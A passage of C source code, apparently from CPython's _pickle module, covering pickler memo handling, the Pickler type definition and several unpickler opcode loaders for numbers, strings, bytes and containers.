else if (type == &PySet_Type) {
status = save_set(self, obj);
goto done;
}
else if (type == &PyFrozenSet_Type) {
status = save_frozenset(self, obj);
goto done;
}
else if (type == &PyList_Type) {
status = save_list(self, obj);
goto done;
}
else if (type == &PyTuple_Type) {
status = save_tuple(self, obj);
goto done;
}
else if (type == &PyType_Type) {
status = save_type(self, obj);
goto done;
}
else if (type == &PyFunction_Type) {
status = save_global(self, obj, NULL);
goto done;
}
/* XXX: This part needs some unit tests. */
/* Get a reduction callable, and call it. This may come from
* self.dispatch_table, copyreg.dispatch_table, the object's
* __reduce_ex__ method, or the object's __reduce__ method.
*/
if (self->dispatch_table == NULL) {
PickleState *st = _Pickle_GetGlobalState();
reduce_func = PyDict_GetItemWithError(st->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_Occurred()) {
goto error;
}
} else {
/* PyDict_GetItemWithError() returns a borrowed reference.
Increase the reference count to be consistent with
PyObject_GetItem and _PyObject_GetAttrId used below. */
Py_INCREF(reduce_func);
}
} else {
reduce_func = PyObject_GetItem(self->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_ExceptionMatches(PyExc_KeyError))
PyErr_Clear();
else
goto error;
}
}
if (reduce_func != NULL) {
Py_INCREF(obj);
reduce_value = _Pickle_FastCall(reduce_func, obj);
}
else if (PyType_IsSubtype(type, &PyType_Type)) {
status = save_global(self, obj, NULL);
goto done;
}
else {
_Py_IDENTIFIER(__reduce__);
_Py_IDENTIFIER(__reduce_ex__);
/* XXX: If the __reduce__ method is defined, __reduce_ex__ is
automatically defined as __reduce__. While this is convenient, this
make it impossible to know which method was actually called. Of
course, this is not a big deal. But still, it would be nice to let
the user know which method was called when something go
wrong. Incidentally, this means if __reduce_ex__ is not defined, we
don't actually have to check for a __reduce__ method. */
/* Check for a __reduce_ex__ method. */
if (_PyObject_LookupAttrId(obj, &PyId___reduce_ex__, &reduce_func) < 0) {
goto error;
}
if (reduce_func != NULL) {
PyObject *proto;
proto = PyLong_FromLong(self->proto);
if (proto != NULL) {
reduce_value = _Pickle_FastCall(reduce_func, proto);
}
}
else {
PickleState *st = _Pickle_GetGlobalState();
/* Check for a __reduce__ method. */
reduce_func = _PyObject_GetAttrId(obj, &PyId___reduce__);
if (reduce_func != NULL) {
reduce_value = _PyObject_CallNoArg(reduce_func);
}
else {
PyErr_Format(st->PicklingError,
"can't pickle '%.200s' object: %R",
type->tp_name, obj);
goto error;
}
}
}
if (reduce_value == NULL)
goto error;
if (PyUnicode_Check(reduce_value)) {
status = save_global(self, obj, reduce_value);
goto done;
}
if (!PyTuple_Check(reduce_value)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"__reduce__ must return a string or tuple");
goto error;
}
status = save_reduce(self, reduce_value, obj);
if (0) {
error:
status = -1;
}
done:
Py_LeaveRecursiveCall();
Py_XDECREF(reduce_func);
Py_XDECREF(reduce_value);
return status;
}
static int
dump(PicklerObject *self, PyObject *obj)
{
const char stop_op = STOP;
if (self->proto >= 2) {
char header[2];
header[0] = PROTO;
assert(self->proto >= 0 && self->proto < 256);
header[1] = (unsigned char)self->proto;
if (_Pickler_Write(self, header, 2) < 0)
return -1;
if (self->proto >= 4)
self->framing = 1;
}
if (save(self, obj, 0) < 0 ||
_Pickler_Write(self, &stop_op, 1) < 0 ||
_Pickler_CommitFrame(self) < 0)
return -1;
self->framing = 0;
return 0;
}
/*[clinic input]
_pickle.Pickler.clear_memo
Clears the pickler's "memo".
The memo is the data structure that remembers which objects the
pickler has already seen, so that shared or recursive objects are
pickled by reference and not by value. This method is useful when
re-using picklers.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_clear_memo_impl(PicklerObject *self)
/*[clinic end generated code: output=8665c8658aaa094b input=01bdad52f3d93e56]*/
{
if (self->memo)
PyMemoTable_Clear(self->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.dump
obj: object
/
Write a pickled representation of the given object to the open file.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_dump(PicklerObject *self, PyObject *obj)
/*[clinic end generated code: output=87ecad1261e02ac7 input=552eb1c0f52260d9]*/
{
/* Check whether the Pickler was initialized correctly (issue3664).
Developers often forget to call __init__() in their subclasses, which
would trigger a segfault without this check. */
if (self->write == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->PicklingError,
"Pickler.__init__() was not called by %s.__init__()",
Py_TYPE(self)->tp_name);
return NULL;
}
if (_Pickler_ClearBuffer(self) < 0)
return NULL;
if (dump(self, obj) < 0)
return NULL;
if (_Pickler_FlushToFile(self) < 0)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Pickler___sizeof___impl(PicklerObject *self)
/*[clinic end generated code: output=106edb3123f332e1 input=8cbbec9bd5540d42]*/
{
Py_ssize_t res, s;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL) {
res += sizeof(PyMemoTable);
res += self->memo->mt_allocated * sizeof(PyMemoEntry);
}
if (self->output_buffer != NULL) {
s = _PySys_GetSizeOf(self->output_buffer);
if (s == -1)
return -1;
res += s;
}
return res;
}
static struct PyMethodDef Pickler_methods[] = {
_PICKLE_PICKLER_DUMP_METHODDEF
_PICKLE_PICKLER_CLEAR_MEMO_METHODDEF
_PICKLE_PICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Pickler_dealloc(PicklerObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->output_buffer);
Py_XDECREF(self->write);
Py_XDECREF(self->pers_func);
Py_XDECREF(self->dispatch_table);
Py_XDECREF(self->fast_memo);
PyMemoTable_Del(self->memo);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Pickler_traverse(PicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->write);
Py_VISIT(self->pers_func);
Py_VISIT(self->dispatch_table);
Py_VISIT(self->fast_memo);
return 0;
}
static int
Pickler_clear(PicklerObject *self)
{
Py_CLEAR(self->output_buffer);
Py_CLEAR(self->write);
Py_CLEAR(self->pers_func);
Py_CLEAR(self->dispatch_table);
Py_CLEAR(self->fast_memo);
if (self->memo != NULL) {
PyMemoTable *memo = self->memo;
self->memo = NULL;
PyMemoTable_Del(memo);
}
return 0;
}
/*[clinic input]
_pickle.Pickler.__init__
file: object
protocol: object = NULL
fix_imports: bool = True
This takes a binary file for writing a pickle data stream.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 3; a backward-incompatible protocol designed for Python 3.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static int
_pickle_Pickler___init___impl(PicklerObject *self, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=b5f31078dab17fb0 input=4faabdbc763c2389]*/
{
_Py_IDENTIFIER(persistent_id);
_Py_IDENTIFIER(dispatch_table);
/* In case of multiple __init__() calls, clear previous content. */
if (self->write != NULL)
(void)Pickler_clear(self);
if (_Pickler_SetProtocol(self, protocol, fix_imports) < 0)
return -1;
if (_Pickler_SetOutputStream(self, file) < 0)
return -1;
/* memo and output_buffer may have already been created in _Pickler_New */
if (self->memo == NULL) {
self->memo = PyMemoTable_New();
if (self->memo == NULL)
return -1;
}
self->output_len = 0;
if (self->output_buffer == NULL) {
self->max_output_len = WRITE_BUF_SIZE;
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->output_buffer == NULL)
return -1;
}
self->fast = 0;
self->fast_nesting = 0;
self->fast_memo = NULL;
if (init_method_ref((PyObject *)self, &PyId_persistent_id,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
if (_PyObject_LookupAttrId((PyObject *)self,
&PyId_dispatch_table, &self->dispatch_table) < 0) {
return -1;
}
return 0;
}
/* Define a proxy object for the Pickler's internal memo object. This is to
* avoid breaking code like:
* pickler.memo.clear()
* and
* pickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*/
/*[clinic input]
_pickle.PicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_clear_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=5fb9370d48ae8b05 input=ccc186dacd0f1405]*/
{
if (self->pickler->memo)
PyMemoTable_Clear(self->pickler->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.PicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_copy_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bb83a919d29225ef input=b73043485ac30b36]*/
{
PyMemoTable *memo;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
memo = self->pickler->memo;
for (size_t i = 0; i < memo->mt_allocated; ++i) {
PyMemoEntry entry = memo->mt_table[i];
if (entry.me_key != NULL) {
int status;
PyObject *key, *value;
key = PyLong_FromVoidPtr(entry.me_key);
value = Py_BuildValue("nO", entry.me_value, entry.me_key);
if (key == NULL || value == NULL) {
Py_XDECREF(key);
Py_XDECREF(value);
goto error;
}
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
Py_DECREF(value);
if (status < 0)
goto error;
}
}
return new_memo;
error:
Py_XDECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.PicklerMemoProxy.__reduce__
Implement pickle support.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy___reduce___impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bebba1168863ab1d input=2f7c540e24b7aae4]*/
{
PyObject *reduce_value, *dict_args;
PyObject *contents = _pickle_PicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
dict_args = PyTuple_New(1);
if (dict_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(dict_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, dict_args);
return reduce_value;
}
static PyMethodDef picklerproxy_methods[] = {
_PICKLE_PICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_PICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_PICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
PicklerMemoProxy_dealloc(PicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->pickler);
PyObject_GC_Del((PyObject *)self);
}
static int
PicklerMemoProxy_traverse(PicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->pickler);
return 0;
}
static int
PicklerMemoProxy_clear(PicklerMemoProxyObject *self)
{
Py_CLEAR(self->pickler);
return 0;
}
static PyTypeObject PicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.PicklerMemoProxy", /*tp_name*/
sizeof(PicklerMemoProxyObject), /*tp_basicsize*/
0,
(destructor)PicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)PicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)PicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
picklerproxy_methods, /* tp_methods */
};
static PyObject *
PicklerMemoProxy_New(PicklerObject *pickler)
{
PicklerMemoProxyObject *self;
self = PyObject_GC_New(PicklerMemoProxyObject, &PicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(pickler);
self->pickler = pickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Pickler_get_memo(PicklerObject *self)
{
return PicklerMemoProxy_New(self);
}
static int
Pickler_set_memo(PicklerObject *self, PyObject *obj)
{
PyMemoTable *new_memo = NULL;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &PicklerMemoProxyType) {
PicklerObject *pickler =
((PicklerMemoProxyObject *)obj)->pickler;
new_memo = PyMemoTable_Copy(pickler->memo);
if (new_memo == NULL)
return -1;
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo = PyMemoTable_New();
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t memo_id;
PyObject *memo_obj;
if (!PyTuple_Check(value) || PyTuple_GET_SIZE(value) != 2) {
PyErr_SetString(PyExc_TypeError,
"'memo' values must be 2-item tuples");
goto error;
}
memo_id = PyLong_AsSsize_t(PyTuple_GET_ITEM(value, 0));
if (memo_id == -1 && PyErr_Occurred())
goto error;
memo_obj = PyTuple_GET_ITEM(value, 1);
if (PyMemoTable_Set(new_memo, memo_obj, memo_id) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be a PicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
PyMemoTable_Del(self->memo);
self->memo = new_memo;
return 0;
error:
if (new_memo)
PyMemoTable_Del(new_memo);
return -1;
}
static PyObject *
Pickler_get_persid(PicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_id");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Pickler_set_persid(PicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_id must be a callable taking one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyMemberDef Pickler_members[] = {
{"bin", T_INT, offsetof(PicklerObject, bin)},
{"fast", T_INT, offsetof(PicklerObject, fast)},
{"dispatch_table", T_OBJECT_EX, offsetof(PicklerObject, dispatch_table)},
{NULL}
};
static PyGetSetDef Pickler_getsets[] = {
{"memo", (getter)Pickler_get_memo,
(setter)Pickler_set_memo},
{"persistent_id", (getter)Pickler_get_persid,
(setter)Pickler_set_persid},
{NULL}
};
static PyTypeObject Pickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pickler" , /*tp_name*/
sizeof(PicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Pickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Pickler___init____doc__, /*tp_doc*/
(traverseproc)Pickler_traverse, /*tp_traverse*/
(inquiry)Pickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Pickler_methods, /*tp_methods*/
Pickler_members, /*tp_members*/
Pickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Pickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/* Temporary helper for calling self.find_class().
XXX: It would be nice to able to avoid Python function call overhead, by
using directly the C version of find_class(), when find_class() is not
overridden by a subclass. Although, this could become rather hackish. A
simpler optimization would be to call the C function when self is not a
subclass instance. */
static PyObject *
find_class(UnpicklerObject *self, PyObject *module_name, PyObject *global_name)
{
_Py_IDENTIFIER(find_class);
return _PyObject_CallMethodIdObjArgs((PyObject *)self, &PyId_find_class,
module_name, global_name, NULL);
}
static Py_ssize_t
marker(UnpicklerObject *self)
{
Py_ssize_t mark;
if (self->num_marks < 1) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "could not find MARK");
return -1;
}
mark = self->marks[--self->num_marks];
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
return mark;
}
static int
load_none(UnpicklerObject *self)
{
PDATA_APPEND(self->stack, Py_None, -1);
return 0;
}
static int
load_int(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
long x;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
/* XXX: Should the base argument of strtol() be explicitly set to 10?
XXX(avassalotti): Should this uses PyOS_strtol()? */
x = strtol(s, &endptr, 0);
if (errno || (*endptr != '\n' && *endptr != '\0')) {
/* Hm, maybe we've got something long. Let's try reading
* it as a Python int object. */
errno = 0;
/* XXX: Same thing about the base here. */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL) {
PyErr_SetString(PyExc_ValueError,
"could not convert string to int");
return -1;
}
}
else {
if (len == 3 && (x == 0 || x == 1)) {
if ((value = PyBool_FromLong(x)) == NULL)
return -1;
}
else {
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
}
}
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_bool(UnpicklerObject *self, PyObject *boolean)
{
assert(boolean == Py_True || boolean == Py_False);
PDATA_APPEND(self->stack, boolean, -1);
return 0;
}
/* s contains x bytes of an unsigned little-endian integer. Return its value
* as a C Py_ssize_t, or -1 if it's higher than PY_SSIZE_T_MAX.
*/
static Py_ssize_t
calc_binsize(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
int i;
size_t x = 0;
if (nbytes > (int)sizeof(size_t)) {
/* Check for integer overflow. BINBYTES8 and BINUNICODE8 opcodes
* have 64-bit size that can't be represented on 32-bit platform.
*/
for (i = (int)sizeof(size_t); i < nbytes; i++) {
if (s[i])
return -1;
}
nbytes = (int)sizeof(size_t);
}
for (i = 0; i < nbytes; i++) {
x |= (size_t) s[i] << (8 * i);
}
if (x > PY_SSIZE_T_MAX)
return -1;
else
return (Py_ssize_t) x;
}
/* s contains x bytes of a little-endian integer. Return its value as a
* C int. Obscure: when x is 1 or 2, this is an unsigned little-endian
* int, but when x is 4 it's a signed one. This is a historical source
* of x-platform bugs.
*/
static long
calc_binint(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
Py_ssize_t i;
long x = 0;
for (i = 0; i < nbytes; i++) {
x |= (long)s[i] << (8 * i);
}
/* Unlike BININT1 and BININT2, BININT (more accurately BININT4)
* is signed, so on a box with longs bigger than 4 bytes we need
* to extend a BININT's sign bit to the full width.
*/
if (SIZEOF_LONG > 4 && nbytes == 4) {
x |= -(x & (1L << 31));
}
return x;
}
static int
load_binintx(UnpicklerObject *self, char *s, int size)
{
PyObject *value;
long x;
x = calc_binint(s, size);
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binint(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
return load_binintx(self, s, 4);
}
static int
load_binint1(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
return load_binintx(self, s, 1);
}
static int
load_binint2(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 2) < 0)
return -1;
return load_binintx(self, s, 2);
}
static int
load_long(UnpicklerObject *self)
{
PyObject *value;
char *s = NULL;
Py_ssize_t len;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* s[len-2] will usually be 'L' (and s[len-1] is '\n'); we need to remove
the 'L' before calling PyLong_FromString. In order to maintain
compatibility with Python 3.0.0, we don't actually *require*
the 'L' to be present. */
if (s[len-2] == 'L')
s[len-2] = '\0';
/* XXX: Should the base argument explicitly set to 10? */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
/* 'size' bytes contain the # of bytes of little-endian 256's-complement
* data following.
*/
static int
load_counted_long(UnpicklerObject *self, int size)
{
PyObject *value;
char *nbytes;
char *pdata;
assert(size == 1 || size == 4);
if (_Unpickler_Read(self, &nbytes, size) < 0)
return -1;
size = calc_binint(nbytes, size);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
/* Corrupt or hostile pickle -- we never write one like this */
PyErr_SetString(st->UnpicklingError,
"LONG pickle has negative byte count");
return -1;
}
if (size == 0)
value = PyLong_FromLong(0L);
else {
/* Read the raw little-endian bytes and convert. */
if (_Unpickler_Read(self, &pdata, size) < 0)
return -1;
value = _PyLong_FromByteArray((unsigned char *)pdata, (size_t)size,
1 /* little endian */ , 1 /* signed */ );
}
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_float(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
double d;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
d = PyOS_string_to_double(s, &endptr, PyExc_OverflowError);
if (d == -1.0 && PyErr_Occurred())
return -1;
if ((endptr[0] != '\n') && (endptr[0] != '\0')) {
PyErr_SetString(PyExc_ValueError, "could not convert string to float");
return -1;
}
value = PyFloat_FromDouble(d);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binfloat(UnpicklerObject *self)
{
PyObject *value;
double x;
char *s;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
x = _PyFloat_Unpack8((unsigned char *)s, 0);
if (x == -1.0 && PyErr_Occurred())
return -1;
if ((value = PyFloat_FromDouble(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_string(UnpicklerObject *self)
{
PyObject *bytes;
PyObject *obj;
Py_ssize_t len;
char *s, *p;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
/* Strip the newline */
len--;
/* Strip outermost quotes */
if (len >= 2 && s[0] == s[len - 1] && (s[0] == '\'' || s[0] == '"')) {
p = s + 1;
len -= 2;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"the STRING opcode argument must be quoted");
return -1;
}
assert(len >= 0);
/* Use the PyBytes API to decode the string, since that is what is used
to encode, and then coerce the result to Unicode. */
bytes = PyBytes_DecodeEscape(p, len, NULL, 0, NULL);
if (bytes == NULL)
return -1;
/* Leave the Python 2.x strings as bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = bytes;
}
else {
obj = PyUnicode_FromEncodedObject(bytes, self->encoding, self->errors);
Py_DECREF(bytes);
if (obj == NULL) {
return -1;
}
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binstring(UnpicklerObject *self, int nbytes)
{
PyObject *obj;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"BINSTRING exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
/* Convert Python 2.x strings to bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = PyBytes_FromStringAndSize(s, size);
}
else {
obj = PyUnicode_Decode(s, size, self->encoding, self->errors);
}
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binbytes(UnpicklerObject *self, int nbytes)
{
PyObject *bytes;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINBYTES exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
bytes = PyBytes_FromStringAndSize(s, size);
if (bytes == NULL)
return -1;
PDATA_PUSH(self->stack, bytes, -1);
return 0;
}
static int
load_unicode(UnpicklerObject *self)
{
PyObject *str;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
str = PyUnicode_DecodeRawUnicodeEscape(s, len - 1, NULL);
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_binunicode(UnpicklerObject *self, int nbytes)
{
PyObject *str;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINUNICODE exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
str = PyUnicode_DecodeUTF8(s, size, "surrogatepass");
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_tuple(UnpicklerObject *self, Py_ssize_t len)
{
PyObject *tuple;
if (Py_SIZE(self->stack) < len)
return Pdata_stack_underflow(self->stack);
tuple = Pdata_poptuple(self->stack, Py_SIZE(self->stack) - len);
if (tuple == NULL)
return -1;
PDATA_PUSH(self->stack, tuple, -1);
return 0;
}
static int
load_tuple(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
return load_counted_tuple(self, Py_SIZE(self->stack) - i);
}
static int
load_empty_list(UnpicklerObject *self)
{
PyObject *list;
if ((list = PyList_New(0)) == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_empty_dict(UnpicklerObject *self)
{
PyObject *dict;
if ((dict = PyDict_New()) == NULL)
return -1;
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_empty_set(UnpicklerObject *self)
{
PyObject *set;
if ((set = PySet_New(NULL)) == NULL)
return -1;
PDATA_PUSH(self->stack, set, -1);
return 0;
}
static int
load_list(UnpicklerObject *self)
{
PyObject *list;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
list = Pdata_poplist(self->stack, i);
if (list == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_dict(UnpicklerObject *self)
{
PyObject *dict, *key, *value;
Py_ssize_t i, j, k;
if ((i = marker(self)) < 0)
return -1;
j = Py_SIZE(self->stack);
if ((dict = PyDict_New()) == NULL)
return -1;
if ((j - i) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "odd number of items for DICT");
Py_DECREF(dict);
return -1;
}
for (k = i + 1; k < j; k += 2) {
key = self->stack->data[k - 1];
value = self->stack->data[k];
if (PyDict_SetItem(dict, key, value) < 0) {
Py_DECREF(dict);
return -1;
}
}
Pdata_clear(self->stack, i);
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_frozenset(UnpicklerObject *self)
{
PyObject *items;
PyObject *frozenset;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
items = Pdata_poptuple(self->stack, i);
if (items == NULL)
return -1;
frozenset = PyFrozenSet_New(items);
Py_DECREF(items);
if (frozenset == NULL)
return -1;
PDATA_PUSH(self->stack, frozenset, -1);
return 0;
}
static PyObject *
instantiate(PyObject *cls, PyObject *args)
{
/* Caller must assure args are a tuple. Normally, args come from
Pdata_poptuple which packs objects from the top of the stack
into a newly created tuple. */
assert(PyTuple_Check(args));
if (!PyTuple_GET_SIZE(args) && PyType_Check(cls)) {
_Py_IDENTIFIER(__getinitargs__);
_Py_IDENTIFIER(__new__);
PyObject *func;
if (_PyObject_LookupAttrId(cls, &PyId___getinitargs__, &func) < 0) {
return NULL;
}
if (func == NULL) {
return _PyObject_CallMethodIdObjArgs(cls, &PyId___new__, cls, NULL);
}
Py_DECREF(func);
}
return PyObject_CallObject(cls, args);
}
static int
load_obj(UnpicklerObject *self)
{
PyObject *cls, *args, *obj = NULL;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
